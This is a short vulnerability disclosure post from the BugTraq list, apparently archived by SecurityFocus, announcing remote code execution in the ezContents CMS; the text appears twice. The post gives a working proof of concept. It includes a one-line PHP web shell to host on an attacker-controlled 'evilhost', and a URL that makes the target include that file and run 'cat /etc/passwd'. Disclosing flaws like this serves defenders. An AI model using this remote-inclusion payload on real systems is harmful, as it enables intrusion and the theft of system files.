BugTraq
Back to list
|
Post reply
Remote Code Execution in ezContents
Jan 10 2004 05:13PM
Zero_X www.lobnan.de Team (zero-x linuxmail org)
Remote Code Execution in ezContents
"ezContents" from www.ezcontents.org allows to execute code.
Example:
Create the following file on your webserver:
----index.php----
<?
system($cmd);
?>
-----------------
And then type in the following URL:
http://targethost/module.php?link=http://evilhost/index.php&cmd=cat /etc/passwd
Zero X, member of www.lobnan.de and www.lostkey.org
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Remote Code Execution in ezContents
"ezContents" from www.ezcontents.org allows to execute code.
Example:
Create the following file on your webserver:
----index.php----
<?
system($cmd);
?>
-----------------
And then type in the following URL:
http://targethost/module.php?link=http://evilhost/index.php&cmd=cat /etc/passwd
Zero X, member of www.lobnan.de and www.lostkey.org
[ reply ]